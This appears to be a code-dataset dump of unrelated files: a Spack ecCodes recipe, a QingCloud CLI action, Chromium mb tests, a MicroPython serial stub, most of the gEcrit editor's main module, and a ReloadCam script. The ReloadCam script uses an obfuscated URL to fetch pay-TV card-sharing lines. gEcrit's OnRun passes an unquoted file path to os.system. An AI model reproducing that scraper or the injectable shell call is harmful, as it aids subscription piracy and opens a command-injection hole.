##############################################################################
#
from spack import *
class Eccodes(CMakePackage):
"""ecCodes is a package developed by ECMWF for processing meteorological
data in GRIB (1/2), BUFR (3/4) and GTS header formats."""
homepage = "https://software.ecmwf.int/wiki/display/ECC/ecCodes+Home"
url = "https://software.ecmwf.int/wiki/download/attachments/45757960/eccodes-2.2.0-Source.tar.gz?api=v2"
list_url = "https://software.ecmwf.int/wiki/display/ECC/Releases"
version('2.5.0', '5a7e92c58418d855082fa573efd352aa')
version('2.2.0', 'b27e6f0a3eea5b92dac37372e4c45a62')
variant('netcdf', default=False,
description='Enable GRIB to NetCDF conversion tool')
variant('jp2k', default='openjpeg', values=('openjpeg', 'jasper', 'none'),
description='Specify JPEG2000 decoding/encoding backend')
variant('png', default=False,
description='Enable PNG support for decoding/encoding')
variant('aec', default=False,
description='Enable Adaptive Entropy Coding for decoding/encoding')
variant('pthreads', default=False,
description='Enable POSIX threads')
variant('openmp', default=False,
description='Enable OpenMP threads')
variant('memfs', default=False,
description='Enable memory based access to definitions/samples')
variant('python', default=False,
description='Enable the Python interface')
variant('fortran', default=True, description='Enable the Fortran support')
variant('build_type', default='RelWithDebInfo',
description='The build type to build',
values=('Debug', 'Release', 'RelWithDebInfo', 'Production'))
depends_on('netcdf', when='+netcdf')
depends_on('openjpeg', when='jp2k=openjpeg')
depends_on('jasper', when='jp2k=jasper')
depends_on('libpng', when='+png')
depends_on('libaec', when='+aec')
depends_on('python@:2', when='+python')
depends_on('py-numpy', when='+python', type=('build', 'run'))
extends('python', when='+python')
conflicts('+openmp', when='+pthreads',
msg='Cannot enable both POSIX threads and OMP')
# The following enforces linking against the specified JPEG2000 backend.
patch('enable_only_openjpeg.patch', when='jp2k=openjpeg')
patch('enable_only_jasper.patch', when='jp2k=jasper')
def cmake_args(self):
variants = ['+netcdf', '+png', '+aec', '+pthreads',
'+openmp', '+memfs', '+python', '+fortran']
options = ['NETCDF', 'PNG', 'AEC', 'ECCODES_THREADS',
'ECCODES_OMP_THREADS', 'MEMFS', 'PYTHON', 'FORTRAN']
args = map(lambda var, opt:
"-DENABLE_%s=%s" %
(opt, 'ON' if var in self.spec else 'OFF'),
variants,
options)
if self.spec.variants['jp2k'].value == 'none':
args.append('-DENABLE_JPG=OFF')
else:
args.append('-DENABLE_JPG=ON')
return args
| lgpl-2.1 | 7,285,572,141,602,078,000 | 43.925532 | 113 | 0.636514 | false |
DaggerES/ReloadCam | DELETED_ReloadCam_Server_Kacsat.py | 1 | 1301 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#Refrescador automatico de clines
#Creado por Dagger - https://github.com/gavazquez
import ReloadCam_Main, ReloadCam_Helper
def GetVersion():
return 3
#Filename must start with Server, classname and argument must be the same!
class Kacsat(ReloadCam_Main.Server):
def GetUrl(self):
#Pon un breakpoint aqui si quieres ver la URL verdadera ;)
#http://kac-sat.noip.me/index.php
realUrl = ReloadCam_Helper.Decrypt("maanpH1wfN3Gz5zUxaVgoaOssXvfypvYz8iWqmGkq7E=")
return realUrl
def GetClines(self):
print "Now getting Kacsat clines!"
kacsatClines = []
kacsatClines.append(self.__GetKacsatCline())
kacsatClines = filter(None, kacsatClines)
if len(kacsatClines) == 0: print "No Kacsat lines retrieved"
return kacsatClines
def __GetKacsatCline(self):
values= {
'user': ReloadCam_Helper.GetMyIP(),
'pass': 'hack-sat.net',
'submit':'Active+User%21'
}
htmlCode = ReloadCam_Helper.GetPostHtmlCode(values, None, self.GetUrl())
cline = ReloadCam_Helper.FindStandardClineInText(htmlCode)
if cline != None and ReloadCam_Helper.TestCline(cline):
return cline
return None
| gpl-3.0 | 1,889,748,658,797,407,500 | 30.731707 | 90 | 0.652575 | false |
yunify/qingcloud-cli | qingcloud/cli/iaas_client/actions/lb/modify_loadbalancer_backend_attributes.py | 1 | 2590 | # =========================================================================
# Copyright 2012-present Yunify, Inc.
# -------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =========================================================================
from qingcloud.cli.iaas_client.actions.base import BaseAction
class ModifyLoadBalancerBackendAttributesAction(BaseAction):
action = 'ModifyLoadBalancerBackendAttributes'
command = 'modify-loadbalancer-backend-attributes'
usage = '%(prog)s -b <lb_backend> [-p <port> -w <weight> -f <conf_file>]'
description = 'Modify load balancer backend attributes.'
@classmethod
def add_ext_arguments(cls, parser):
parser.add_argument('-b', '--lb_backend', dest='lb_backend',
action='store', type=str, default='',
help='the ID of load balancer backend.')
parser.add_argument('-p', '--port', dest='port',
action='store', type=int, default=None,
help='the backend port.')
parser.add_argument('-w', '--weight', dest='weight',
action='store', type=int, default=None,
help='the backend weight, valid value is from 1 to 100.')
parser.add_argument('--disabled', dest='disabled',
action='store', type=int, default=None,
help='disable this backend or not, 0: enable, 1: disable.')
parser.add_argument('-N', '--name', dest='name',
action='store', type=str, default=None,
help='new backend name')
@classmethod
def build_directive(cls, options):
if not options.lb_backend:
print('error: backend should be specified')
return None
return {
'loadbalancer_backend': options.lb_backend,
'loadbalancer_backend_name': options.name,
'port': options.port,
'weight': options.weight,
'disabled': options.disabled,
}
| apache-2.0 | -2,008,896,815,739,194,600 | 41.459016 | 77 | 0.57027 | false |
ltilve/chromium | tools/mb/mb_unittest.py | 1 | 4852 | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests for mb.py."""
import json
import sys
import unittest
import mb
class FakeMBW(mb.MetaBuildWrapper):
def __init__(self):
super(FakeMBW, self).__init__()
self.files = {}
self.calls = []
self.out = ''
self.err = ''
self.platform = 'linux2'
self.chromium_src_dir = '/fake_src'
self.default_config = '/fake_src/tools/mb/mb_config.pyl'
def ExpandUser(self, path):
return '$HOME/%s' % path
def Exists(self, path):
return self.files.get(path) is not None
def ReadFile(self, path):
return self.files[path]
def WriteFile(self, path, contents):
self.files[path] = contents
def Call(self, cmd):
self.calls.append(cmd)
return 0, '', ''
def Print(self, *args, **kwargs):
sep = kwargs.get('sep', ' ')
end = kwargs.get('end', '\n')
f = kwargs.get('file', sys.stdout)
if f == sys.stderr:
self.err += sep.join(args) + end
else:
self.out += sep.join(args) + end
class IntegrationTest(unittest.TestCase):
def test_validate(self):
# Note that this validates that the actual mb_config.pyl is valid.
ret = mb.main(['validate', '--quiet'])
self.assertEqual(ret, 0)
TEST_CONFIG = """\
{
'common_dev_configs': ['gn_debug'],
'configs': {
'gyp_rel_bot': ['gyp', 'rel', 'goma'],
'gn_debug': ['gn', 'debug'],
'gn_rel_bot': ['gn', 'rel', 'goma'],
'private': ['gyp', 'fake_feature1'],
'unsupported': ['gn', 'fake_feature2'],
},
'masters': {
'fake_master': {
'fake_builder': 'gyp_rel_bot',
'fake_gn_builder': 'gn_rel_bot',
},
},
'mixins': {
'fake_feature1': {
'gn_args': 'enable_doom_melon=true',
'gyp_defines': 'doom_melon=1',
},
'fake_feature2': {
'gn_args': 'enable_doom_melon=false',
'gyp_defaults': 'doom_melon=0',
},
'gyp': {'type': 'gyp'},
'gn': {'type': 'gn'},
'goma': {
'gn_args': 'use_goma=true goma_dir="$(goma_dir)"',
'gyp_defines': 'goma=1 gomadir="$(goma_dir)"',
},
'rel': {
'gn_args': 'is_debug=false',
'gyp_config': 'Release',
},
'debug': {
'gn_args': 'is_debug=true',
},
},
'private_configs': ['private'],
'unsupported_configs': ['unsupported'],
}
"""
class UnitTest(unittest.TestCase):
def fake_mbw(self, files):
mbw = FakeMBW()
if files:
for path, contents in files.items():
mbw.files[path] = contents
mbw.files.setdefault(mbw.default_config, TEST_CONFIG)
return mbw
def check(self, args, mbw=None, files=None, out=None, err=None, ret=None):
if not mbw:
mbw = self.fake_mbw(files)
mbw.ParseArgs(args)
actual_ret = mbw.args.func()
if ret is not None:
self.assertEqual(actual_ret, ret)
if out is not None:
self.assertEqual(mbw.out, out)
if err is not None:
self.assertEqual(mbw.err, err)
return mbw
def test_gn_analyze(self):
files = {'/tmp/in.json': """{\
"files": ["foo/foo_unittest.cc"],
"targets": ["foo_unittests", "bar_unittests"]
}"""}
mbw = self.fake_mbw(files)
mbw.Call = lambda cmd: (0, 'out/Default/foo_unittests\n', '')
self.check(['analyze', '-c', 'gn_debug', '//out/Default',
'/tmp/in.json', '/tmp/out.json'], mbw=mbw, ret=0)
out = json.loads(mbw.files['/tmp/out.json'])
self.assertEqual(out, {
'status': 'Found dependency',
'targets': ['foo_unittests'],
'build_targets': ['foo_unittests']
})
def test_gyp_analyze(self):
self.check(['analyze', '-c', 'gyp_rel_bot', '//out/Release',
'/tmp/in.json', '/tmp/out.json'],
ret=0)
def test_gen(self):
self.check(['gen', '-c', 'gn_debug', '//out/Default'], ret=0)
self.check(['gen', '-c', 'gyp_rel_bot', '//out/Release'], ret=0)
def test_goma_dir_expansion(self):
self.check(['lookup', '-c', 'gyp_rel_bot', '-g', '/foo'], ret=0,
out=("python build/gyp_chromium -G 'output_dir=<path>' "
"-G config=Release -D goma=1 -D gomadir=/foo\n"))
self.check(['lookup', '-c', 'gn_rel_bot', '-g', '/foo'], ret=0,
out=("/fake_src/buildtools/linux64/gn gen '<path>' "
"'--args=is_debug=false use_goma=true "
"goma_dir=\"/foo\"'\n" ))
def test_help(self):
self.assertRaises(SystemExit, self.check, ['-h'])
self.assertRaises(SystemExit, self.check, ['help'])
self.assertRaises(SystemExit, self.check, ['help', 'gen'])
def test_lookup(self):
self.check(['lookup', '-c', 'gn_debug'], ret=0)
def test_validate(self):
self.check(['validate'], ret=0)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | -1,060,539,262,879,962,600 | 27.209302 | 76 | 0.561006 | false |
mbuesch/pyprofibus | stublibs/serial.py | 1 | 2414 | from pyprofibus.compat import *
import time
PARITY_EVEN = "E"
PARITY_ODD = "O"
STOPBITS_ONE = 1
STOPBITS_TWO = 2
class SerialException(Exception):
pass
class Serial(object):
def __init__(self):
self.__isMicropython = isMicropython
self.port = "/dev/ttyS0"
self.__portNum = None
self.baudrate = 9600
self.bytesize = 8
self.parity = PARITY_EVEN
self.stopbits = STOPBITS_ONE
self.timeout = 0
self.xonxoff = False
self.rtscts = False
self.dsrdtr = False
self.__lowlevel = None
def open(self):
if self.__isMicropython:
port = self.port
for sub in ("/dev/ttyS", "/dev/ttyUSB", "/dev/ttyACM", "COM", "UART", ):
port = port.replace(sub, "")
try:
self.__portNum = int(port.strip())
except ValueError:
raise SerialException("Invalid port: %s" % self.port)
try:
import machine
self.__lowlevel = machine.UART(
self.__portNum,
self.baudrate,
self.bytesize,
0 if self.parity == PARITY_EVEN else 1,
1 if self.stopbits == STOPBITS_ONE else 2)
print("Opened machine.UART(%d)" % self.__portNum)
except Exception as e:
raise SerialException("UART%d: Failed to open:\n%s" % (
self.__portNum, str(e)))
return
raise NotImplementedError
def close(self):
if self.__isMicropython:
try:
if self.__lowlevel is not None:
self.__lowlevel.deinit()
self.__lowlevel = None
print("Closed machine.UART(%d)" % self.__portNum)
except Exception as e:
raise SerialException("UART%d: Failed to close:\n%s" % (
self.__portNum, str(e)))
return
raise NotImplementedError
def write(self, data):
if self.__isMicropython:
try:
self.__lowlevel.write(data)
except Exception as e:
raise SerialException("UART%d write(%d bytes) failed: %s" % (
self.__portNum, len(data), str(e)))
return
raise NotImplementedError
def read(self, size=1):
if self.__isMicropython:
try:
data = self.__lowlevel.read(size)
if data is None:
return b""
return data
except Exception as e:
raise SerialException("UART%d read(%d bytes) failed: %s" % (
self.__portNum, size, str(e)))
raise NotImplementedError
def flushInput(self):
if self.__isMicropython:
while self.__lowlevel.any():
self.__lowlevel.read()
return
raise NotImplementedError
def flushOutput(self):
if self.__isMicropython:
time.sleep(0.01)
return
raise NotImplementedError
| gpl-2.0 | 8,178,868,719,447,884,000 | 23.886598 | 75 | 0.652444 | false |
cgroza/gEcrit | gEcrit.py | 1 | 29353 | # Copyright (C) 2011 Groza Cristian
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#!/usr/bin/python
# -*- coding: utf-8 -*-
import wx.lib.inspection
import sys, types
import collections
from Configuration import *
from Logger import *
from AboutWindow import *
from SyntaxHighlight import *
from ConfigWindow import *
from PrettyPrinter import *
from FindReplaceText import *
from AutoComplet import *
from StcTextCtrl import *
from Menu import *
from Toolbar import *
from gEcritPluginManager import *
from yapsy.PluginManager import PluginManager
from data.plugins.categories import *
from AuiNoteBook import *
from gEcritSession import *
import Exceptions
import wx.aui
import gettext
import logging
logging.basicConfig(level=logging.DEBUG)
class gEcrit(wx.Frame):
"""
Editor
This class is the entry point in the program.
It creates all the user interface and initializes
the required objects and classes.
The functions that cannot go into another objects
for diverse reasons go here.
"""
def dummy_tr(self, tr):
return tr
def __init__(self, id, parent):
"""
__init__
Creates the user interface.
Initializez the terminals if enabled.
Creates the required GUI and non GUI objects.
"""
BOTTOMPANEL_ID = 4002
SIDEPANEL_ID = 3999
try:
self.presLang = gettext.translation("gEcrit", "./locale")
self._ = self.presLang.ugettext
self.presLang.install()
except:
print("Translation for local language not found.")
self._ = self.dummy_tr
pathname = os.path.abspath(os.path.dirname((sys.argv)[0])) # Finding where
os.chdir(pathname) # gEcrit is running
#Setting up the plugin envirenment
self.general_plugins = {}
self.passive_plugins = {}
self.plugin_manager = PluginManager(
categories_filter={"General": General,
"Passives" : Passive})
#Sets YAPSY the plugin directory.
self.plugin_path = os.path.join(pathname, "data", "plugins")
self.plugin_manager.setPluginPlaces([self.plugin_path])
self.plugin_manager.locatePlugins()
#self.plugin_manager.collectPlugins()
self.plugin_manager.loadPlugins()
self.activated_plugins = Config.GetOption("ActivePlugins")
#populating the general plugin index
for f in self.plugin_manager.getPluginsOfCategory("General"):
if f.plugin_object.name in self.activated_plugins:
self.general_plugins[f.plugin_object.name] = f.plugin_object
#the passive plugins now
for p in self.plugin_manager.getPluginsOfCategory("Passives"):
if p.plugin_object.name in self.activated_plugins:
self.passive_plugins[p.plugin_object.name] = p.plugin_object
self.id_range = []
#getting the command line file argument
if "gEcrit.py" not in (sys.argv)[-1]:
target_file = os.path.normpath(os.path.realpath(sys.argv[-1]))
#no file was provided
else:
target_file = None
wx.Frame.__init__(self, parent, 1000, 'gEcrit', size=(700, 600))
self.Bind(wx.EVT_CLOSE, self.OnQuit)
#this object will handle layout and docking/undocking of widgets
self.aui_manager = wx.aui.AuiManager(self)
#creating the status bar
self.status_bar = self.CreateStatusBar()
self.status_bar.SetStatusText("Done")
self.status_bar.SetFieldsCount(3)
self.status_bar.SetId(999)
if not Config.GetOption("StatusBar"):
self.status_bar.Hide()
self.menubar = MainMenu(self)
self.SetMenuBar(self.menubar)
#setting the application icon
self.SetIcon(wx.Icon('icons/gEcrit.png', wx.BITMAP_TYPE_PNG))
#this variable is incremented each time we create a StcControl
self.text_id = 0
#finding the user home folder
self.HOMEDIR = os.path.expanduser('~')
os.chdir(os.path.abspath(self.HOMEDIR))
#creating a plugin manager instance
self.plugin_conf_manager = gEcritPluginManager(self)
#creating the left side notebook
self.side_notebook = wx.aui.AuiNotebook(self, id=SIDEPANEL_ID, size=(-1,-1),
style=wx.BORDER_SUNKEN|wx.aui.AUI_NB_TAB_SPLIT|wx.aui.AUI_NB_TAB_MOVE|wx.aui.AUI_NB_SCROLL_BUTTONS )
#creating the bottom side notebook
self.bottom_notebook = wx.aui.AuiNotebook(self, id=BOTTOMPANEL_ID, size=(-1,
-1), style=wx.BORDER_SUNKEN|wx.aui.AUI_NB_TAB_SPLIT|wx.aui.AUI_NB_TAB_MOVE|wx.aui.AUI_NB_SCROLL_BUTTONS )
#the aui notebook that will manage editor tabs
self.nb = AuiNoteBook(parent = self)
#going back to application running point
os.chdir(pathname)
#binding the menubar events
f = wx.FindWindowById
self.Bind(wx.EVT_MENU, lambda event: self.NewTab(event,
"New Document", "New Document"), id=500)
self.Bind(wx.EVT_MENU, lambda event: self.OnOpenFile(event), id=
501)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).Save(event),
id=502)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).SaveAs(event),
id=503)
self.Bind(wx.EVT_MENU, self.OnPrint,id=504)
self.Bind(wx.EVT_MENU, lambda event: self.OnMenuCloseTab(event,
(self.id_range)[self.nb.GetSelection()]), id=505)
self.Bind(wx.EVT_MENU, lambda event: self.OnQuit(event), id=506)
self.Bind(wx.EVT_MENU, self.SaveAll, id=563)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnReload(event),id = 507)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnUndo(event),
id=520)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnRedo(event),
id=521)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnCut(event),
id=522)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnCopy(event),
id=523)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnPaste(event),
id=524)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnSelectAll(event),
id=525)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnSelectCodeBlock(event),
id=562)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnInsertDate(event),
id=526)
self.Bind(wx.EVT_MENU, lambda event: self.OnPrefs(event), id=527)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnDedent(event),
id=528)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnIndent(event),
id=529)
self.Bind(wx.EVT_MENU, lambda event:f((self.id_range)[self.nb.GetSelection()]).OnComment(event),
id=559)
self.Bind(wx.EVT_MENU, lambda event:f((self.id_range)[self.nb.GetSelection()]).OnUnComment(event),
id=560)
self.Bind(wx.EVT_MENU, lambda event: FindRepl.FindDocText(event, (self.id_range)[self.nb.GetSelection()]),
id=530)
self.Bind(wx.EVT_MENU, lambda event: FindRepl.ReplaceDocText(event, (self.id_range)[self.nb.GetSelection()]),
id=531)
self.Bind(wx.EVT_MENU, lambda event: FindRepl.FindDocText(event, (self.id_range)[self.nb.GetSelection()],wx.stc.STC_FIND_REGEXP),
id=532)
self.Bind(wx.EVT_MENU, lambda event: FindRepl.ReplaceDocText(event ,(self.id_range)[self.nb.GetSelection()], wx.stc.STC_FIND_REGEXP),
id=533)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnStartRecordMacro(event), id=534)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnStopRecordMacro(event), id=542)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnMacroPlayback(event), id=543)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnZoomIn(event),
id=535)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnZoomOut(event),
id=536)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnResetZoom(event),
id=537)
self.Bind(wx.EVT_MENU, lambda event: Config.ChangeOption("LineNumbers",
self.menubar.IsChecked(538), self.id_range), id=538)
self.Bind(wx.EVT_MENU, lambda event: Config.ChangeOption("FoldMarks",
self.menubar.IsChecked(539), self.id_range), id=539)
self.Bind(wx.EVT_MENU, lambda event: Config.ChangeOption("Whitespace",
self.menubar.IsChecked(540), self.id_range), id=540)
self.Bind(wx.EVT_MENU, lambda event: Config.ChangeOption("IndetationGuides",
self.menubar.IsChecked(541), self.id_range), id=541)
self.Bind(wx.EVT_MENU, lambda event: Config.ChangeOption("EdgeLine",
self.menubar.IsChecked(546), self.id_range), id=546)
self.Bind(wx.EVT_MENU, lambda event: Config.ChangeOption("SyntaxHighlight",
self.menubar.IsChecked(547), self.id_range), id=547)
self.Bind(wx.EVT_MENU, lambda event: Config.ChangeOption("StatusBar",
self.menubar.IsChecked(545), self.id_range), id=545)
self.Bind(wx.EVT_MENU, self.OnFullScreen, id=557)
self.Bind(wx.EVT_MENU, self.ToggleSidePanel, id = 548)
self.Bind(wx.EVT_MENU, self.ToggleBottomPanel, id = 549)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnRemoveTrails(event),id=551)
self.Bind(wx.EVT_MENU, lambda event: self.OnRun(event,self.id_range[self.nb.GetSelection()]), id = 558)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).Tabify(event), id = 552 )
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).UnTabify(event), id = 553 )
self.Bind(wx.EVT_MENU, self.SaveSessionFile , id = 554)
self.Bind(wx.EVT_MENU, gEcritSession.DeleteSessionFile , id = 555)
self.Bind(wx.EVT_MENU, lambda event: Config.ChangeOption("Session",self.menubar.IsChecked(556)) , id = 556)
self.Bind(wx.EVT_MENU, self.plugin_conf_manager.ShowMe, id = 564 )
self.Bind(wx.EVT_MENU, lambda event: self.OnAbout(event), id=550)
#setting up the toolbar
self.toolbar = MainToolbar(self, -1)
self.FontCtrl = wx.FontPickerCtrl(self.toolbar, 607, size=(100,
30))
self.Bind(wx.EVT_FONTPICKER_CHANGED, lambda event: ChangeFont(event,
self.FontCtrl.GetSelectedFont(), self.id_range))
#the goto line text box
self.toolbar.AddControl(self.FontCtrl)
self.toolbar.AddControl(wx.TextCtrl(self.toolbar, 608, size=(-1,
-1), style=wx.TE_PROCESS_ENTER))
#Binding toolbar events
self.Bind(wx.EVT_TOOL, lambda event: self.NewTab(event,
"New Document", "New Document"), id=600)
self.Bind(wx.EVT_TOOL, self.OnOpenFile, id=601)
self.Bind(wx.EVT_TOOL, lambda event: f((self.id_range)[self.nb.GetSelection()]).Save(event),
id=602)
self.Bind(wx.EVT_TOOL, lambda event: f((self.id_range)[self.nb.GetSelection()]).SaveAs(event),
id=603)
self.Bind(wx.EVT_TOOL, self.OnPrefs, id=604)
self.Bind(wx.EVT_TOOL, self.OnQuit, id=605)
self.Bind(wx.EVT_TEXT_ENTER, lambda event: self.OnGotoBox(event,
(self.id_range)[self.nb.GetSelection()]), id=608)
self.Bind(wx.EVT_TOOL, self.OnPrint, id=609)
self.Bind(wx.EVT_TOOL, lambda event: self.OnRun(event, (self.id_range)[self.nb.GetSelection()]),
id=610)
#Give the plugins a chance to set themselves in the system
#generals first
for g in self.general_plugins:
self.general_plugins[g].Init(self)
#passives now
for p in self.passive_plugins:
self.passive_plugins[p].Init(self)
#put it in the middle of the sceen
self.Centre()
#the preferences window
self.conf_win = ConfFrame = CfgFrame(self)
#addung the pane to the aui manager.
self.aui_manager.AddPane(self.toolbar, wx.aui.AuiPaneInfo().Name("toolbar").Caption(self._("Toolbar")).ToolbarPane().Top().CloseButton(False))
self.aui_manager.AddPane(self.nb, wx.aui.AuiPaneInfo().Name("editor tabs").Caption(self._("Tabs")).CenterPane())
self.aui_manager.AddPane(self.bottom_notebook, wx.aui.AuiPaneInfo().Name("bottom panel").Caption(self._("Assistants and others")).Bottom().BestSize((700,150)).PinButton(True).MaximizeButton(True))
self.aui_manager.AddPane(self.side_notebook, wx.aui.AuiPaneInfo().Name("left_side panel").Caption(self._("Toolbox")).Left().BestSize((150,400)).PinButton(True).MaximizeButton(True))
#loading saved session if any exists and if enabled
if Config.GetOption("Session"):
self.LoadSessionFile()
#make changes visible
self.aui_manager.Update()
if target_file: #load command line file path argument
self.NewTab(0, os.path.split(target_file)[-1], target_file)
def LoadSessionFile(self):
"""
LoadSessionFile
Loads the session file if it exists.
If it does not, creates an instance.
"""
try:
self.session = gEcritSession.LoadFromFile()
self.session.RestoreAppState(self)
self.SetStatus(0,self._ ( "Session file loaded."))
except Exceptions.NoSessionFile:
self.session = gEcritSession()
def SaveSessionFile(self, event):
"""
SaveSessionFile
Reccords the application state and saves it to disk via the
session instance.
"""
try: #testing if a session object exists
self.session
except AttributeError:
self.session = gEcritSession()
self.session.RecordAppState(self)
self.session.SaveToFile()
self.SetStatus(event, self._ ("Session saved."))
def OnFullScreen(self,event):
"""
OnFullScreen
Makes the main window fullscreen.
"""
self.ShowFullScreen(not self.IsFullScreen(),wx.FULLSCREEN_NOCAPTION)
def OnPrefs(self, event):
"""
OnPrefs
Shows the preferences window.
"""
self.conf_win.ShowMe(0)
def NewTab(self, event, nb, file_path):
"""
NewTab
Creates a new AUI NOTEBOOK tab, adds the contents,
initializez a STC object for it and binds some of its events.
Creates the sidebar, adds a notebook and adds its utilities
in its tabs.
"""
if not file_path:
return
#update recent file list
if file_path != "New Document" and file_path != "":
if not os.path.exists(file_path):
wx.MessageDialog(None, self._ ("Could not load file.\nThe file ")+file_path+self._ (" does not exists."),self._ ("Input Error") ,wx.OK).ShowModal()
return
lst = Config.GetOption("RecentFiles")
lst.append(file_path)
Config.ChangeOption("RecentFiles",lst)
self.menubar.UpdateRecentFiles()
#the parent of the StcControl
panel = wx.Panel(self)
panel.identifierTag = nb
#hiding self.text_id
text_id = self.text_id
#set up the editor
text_ctrl = StcTextCtrl(panel, self.text_id, file_path)
#the StcControl sizer
text_ctrl_sizer = wx.BoxSizer(wx.HORIZONTAL)
text_ctrl_sizer.Add(text_ctrl, 1, wx.EXPAND)
panel.SetSizer(text_ctrl_sizer)
panel.Fit()
#append the id of this StcControl to the id_range
self.id_range.append(text_id)
text_ctrl.SetBufferedDraw(True)
#apply the font
text_ctrl.StyleSetFont(0, self.FontCtrl.GetSelectedFont())
#add the panel as a new tab
self.nb.AddPage(panel, str(nb), select=True)
if file_path == "New Document" or file_path == "":
#notify plugins
for g in self.general_plugins:
self.general_plugins[g].NotifyNewTabOpened()
self.text_id += 1
return text_ctrl
def OnRun(self, event, text_id):
"""
Runs the current document in a xterm window, for testing.
"""
cur_doc = wx.FindWindowById(text_id)
cur_doc.Save(0)
os.system("xterm -e sh runner.sh "+cur_doc.GetFilePath())
def OnGotoBox(self, event, text_id):
"""
OnGotoBox
Finds the current document, and scrolls to the line indicated
by its input upon the Return key.
"""
cur_doc = wx.FindWindowById(text_id)
goto = wx.FindWindowById(608)
scroll_pos = int(goto.GetLineText(0))
cur_doc.ScrollToLine(scroll_pos - 1)
def OnPrint(self, event):
"""
OnPrint
Finds the document, sets the prints name, and calls the
wxPython toolkit to print the contents
"""
print_dlg = PrettyPrinter(self)
del print_dlg
def OnAbout(self, event):
"""
OnAbout
Shows the about window.
"""
#ShowAbout = AboutWindow
about_win = AboutWindow()
del about_win
def OnQuit(self, event):
"""
OnQuit
Closes the main window, stops the terminals, and kills the
application process.
It promps the user for confirmation.
"""
#warn the user
warn_dlg = wx.MessageDialog(None,
self._ ("Please make sure that your data is\
saved.\nAre you sure you want to quit?"),
self._ ("Are you sure?"), style=wx.YES_NO)
warn_dlg_val = warn_dlg.ShowModal()
if warn_dlg_val != 5104: #YES
#call the quit method to stop the terminals and the plugins
self.Quit()
def Quit(self):
#stop ond notify all plugins of application shutdown.
#generals now
for g in self.general_plugins:
self.general_plugins[g].Stop()
for p in self.passive_plugins:
self.passive_plugins[p].Stop()
#stop the shells if activated
if Config.GetOption("Session"):
self.SaveSessionFile(0)
#exit status 0, all ok
sys.exit(0)
def OnMenuCloseTab(self, event, text_id):
self.ManageCloseTab(False, text_id)
def ManageCloseTab(self, event, text_id):
"""
ManageCloseTab
Manages the process of closing a tab.
Checks if document is saved, prompts the user if not.
If this is the last tab in the application, it closes the
terminals, the window and kills the application.
If not, it decreases the number of tabs and delted the AUI
NETBOOK page.
"""
cur_doc = wx.FindWindowById(text_id)
current_text = cur_doc.GetText()
#check if the user saved the changes
if cur_doc.save_record != current_text:
#if not, notify him
save_prompt = wx.MessageDialog(None, self._ ("The file ") + os.path.split(cur_doc.GetFilePath())[-1] +
self._ (" is not saved.\n\
Do you wish to save it?"), "",
style=wx.CANCEL | wx.YES | wx.NO)
prompt_val_ = save_prompt.ShowModal()
if prompt_val_ == 5103: #YES
if not cur_doc.Save(0):
event.Veto()
return
else:
self.id_range.remove(text_id)
elif prompt_val_ == 5101: #CANCEL
event.Veto()
return
elif prompt_val_ == 5104: #NO
self.id_range.remove(text_id)
save_prompt.Destroy()
else:
self.id_range.remove(text_id)
# skip the event and let the AuiNotebook handle the deletion
cur_doc.Deactivate() # tell the StcTextCtrl to prepare for deletition
if not event: # check if it was fired from menu
self.nb.DeletePage(self.nb.GetSelection())
else:
event.Skip()
def OnOpenFile(self, event):
"""
OnOpenFile
Collects a path for a new file via a file dialog.
"""
open_file_dlg = wx.FileDialog(None, style=wx.OPEN | wx.FD_MULTIPLE)
if self.menubar.last_recent != "":
#go to the last accessed folder
open_file_dlg.SetDirectory(os.path.split(self.menubar.last_recent)[0])
else:
open_file_dlg.SetDirectory(self.HOMEDIR)
